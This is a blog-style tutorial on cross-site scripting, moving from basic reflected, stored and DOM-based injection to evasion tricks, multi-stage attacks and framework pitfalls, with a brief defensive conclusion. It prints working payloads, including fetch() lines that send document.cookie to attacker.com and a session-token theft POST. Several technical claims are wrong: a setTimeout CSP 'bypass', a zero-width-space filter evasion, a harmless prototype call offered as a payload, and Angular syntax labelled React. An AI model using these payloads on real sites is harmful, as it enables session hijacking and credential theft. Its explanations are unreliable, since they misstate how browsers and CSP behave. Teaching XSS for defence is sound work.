Author: Trix Cyrus
Waymap Pentesting tool: Click Here
TrixSec Github: Click Here
TrixSec Telegram: Click Here
Cross-Site Scripting (XSS) attacks have evolved over time, with attackers developing increasingly sophisticated methods to exploit vulnerabilities in web applications. In this part, we will break down the core anatomy of an XSS attack, starting with its fundamental concepts and progressively moving toward advanced exploitation methods, payload crafting, and evasion techniques.
1. Basic Understanding of XSS
At its core, XSS allows attackers to inject malicious scripts into web pages, which are then executed by the browsers of unsuspecting users. These scripts can steal sensitive data (such as cookies or session information), deface websites, or perform other malicious actions.
Types of XSS:
- Reflected XSS: Occurs when user input is reflected immediately in the page response without being sanitized. The attacker exploits this to inject malicious scripts.
- Stored XSS: Happens when the malicious script is permanently stored on the server (e.g., in a database) and served to every user who accesses the vulnerable page.
- DOM-based XSS: Involves JavaScript that manipulates the DOM in an unsafe manner, leading to XSS vulnerability.
Basic Exploitation Example:
An attacker might inject a simple JavaScript payload into a URL query parameter:
http://victimsite.com/search?q=<script>alert('XSS')</script>
If the application doesn’t properly sanitize the q parameter, this will cause the browser to execute the injected script, showing an alert.
2. Advanced Payload Crafting
As we move beyond simple attacks, the complexity of XSS payloads increases. Crafting effective payloads involves bypassing filters, evading detection, and ensuring that the script runs in the intended context. Here, we'll focus on advanced payloads and their crafting strategies.
Polyglot Payloads:
Polyglot payloads are designed to work in different contexts and can evade some basic filtering techniques. These payloads may function both as part of an HTML tag and within a script block.
Example:
<img src="x" onerror="alert('XSS')"> <!-- Polyglot payload -->
This payload can work in an img tag where the browser might execute the onerror JavaScript event when the image fails to load.
Bypassing Content Security Policy (CSP):
Modern applications implement CSP to restrict the types of content loaded on a page. However, savvy attackers can still find ways around these restrictions, often by using indirect script execution or exploiting misconfigurations.
Example:
If CSP prevents inline script execution, attackers can use alternative methods, such as executing JavaScript via setTimeout() or through external resources:
setTimeout(function(){ alert('XSS'); }, 100);
3. Evasion Techniques and Advanced Exploitation
Once an attacker understands the basic mechanisms of XSS, they can start crafting more sophisticated attacks by evading security mechanisms like input sanitization, encoding, and CSP. Let’s explore these advanced techniques.
Evading JavaScript Filters:
Modern web applications often employ filters to sanitize user input and prevent script execution. However, attackers use various tricks to bypass these filters, such as:
- Unicode Encoding: Attackers encode malicious payloads using Unicode characters to bypass filters that block standard script tags.
<script\u200b>alert('XSS')</script>
The \u200b character (a zero-width space) can often bypass basic input filters by breaking up the script tag.
- Using JavaScript Prototypes: By manipulating JavaScript prototypes, attackers can often bypass restrictions and inject payloads indirectly.
Object.prototype.toString.call(window.location);
Exploiting DOM-based XSS:
In DOM-based XSS, attackers manipulate the DOM to execute their payload. This type of attack happens entirely within the browser and doesn’t require server-side code execution.
Example:
document.getElementById('userInput').innerHTML = location.hash;
If the input data (location.hash) is unsanitized, an attacker could inject harmful JavaScript into the URL fragment identifier, causing the browser to execute it when the page is loaded.
4. Multi-Stage XSS Attacks
In advanced XSS attacks, the goal is not always immediate exploitation. Instead, attackers might use multi-stage techniques to gather information or set up a more complex attack. These stages include data exfiltration, social engineering, and stealthy payload delivery.
Stage 1 - Information Gathering:
Attackers may start by injecting benign payloads that only log information from the victim’s session, such as cookies, credentials, or local storage data. This stage often operates in the background and collects data silently.
fetch('http://attacker.com/log?data=' + encodeURIComponent(document.cookie));
Stage 2 - Full Attack Execution:
Once enough data has been collected, the attacker can trigger the main exploit, such as session hijacking or credential theft. This might involve sending collected data to an external server or taking over user accounts.
if (document.cookie.includes('sessionToken')) {
fetch('http://attacker.com/stealSession', { method: 'POST', body: document.cookie });
}
5. Advanced XSS in JavaScript Frameworks (Angular, React, Vue)
As modern web applications use JavaScript frameworks like Angular, React, and Vue, attackers have adapted their techniques to exploit vulnerabilities within these frameworks. While frameworks like Angular and React provide built-in protections against XSS, improper use or misconfigurations can still lead to vulnerabilities.
React and Angular (Binding Exploits):
XSS vulnerabilities in Angular or React usually occur when user input is directly inserted into templates without proper sanitation. These frameworks use data-binding, but developers may inadvertently allow unsafe input.
Example:
<div [innerHTML]="userInput"></div>
If userInput contains a script tag, React or Angular might sanitize it incorrectly, leading to XSS vulnerabilities.
Vue.js (Template Injection):
Vue.js uses a reactive data-binding system. Attackers can inject malicious templates if the framework’s built-in sanitization doesn’t handle the input correctly.
Example:
Attackers may inject a malicious template that allows JavaScript code execution when the Vue component renders it.
6. XSS in Third-Party Integrations and WebSockets
One of the most advanced methods attackers use is targeting third-party integrations and WebSockets, which are becoming increasingly common in modern web applications.
XSS in Third-Party Integrations:
Third-party services like ad networks, analytics, or social media widgets often inject scripts into web pages. An attacker may exploit XSS vulnerabilities within these third-party services to execute malicious code across multiple sites.
Example:
Injecting malicious code into an embedded social media feed or ad script could lead to widespread exploitation across various domains.
XSS Over WebSockets:
XSS attacks are no longer limited to HTTP requests; WebSockets can also be a vector for exploitation. Attackers can inject malicious messages through WebSocket channels, taking advantage of real-time communications.
Conclusion
Understanding the anatomy of XSS attacks, from basic injections to sophisticated multi-stage exploits, is critical for defending modern web applications. As attackers develop new evasion techniques and advanced exploitation methods, developers and security professionals must stay ahead by implementing strong input validation, content security policies, and staying informed about emerging trends in XSS vulnerabilities.
~Trixsec
Top comments (0)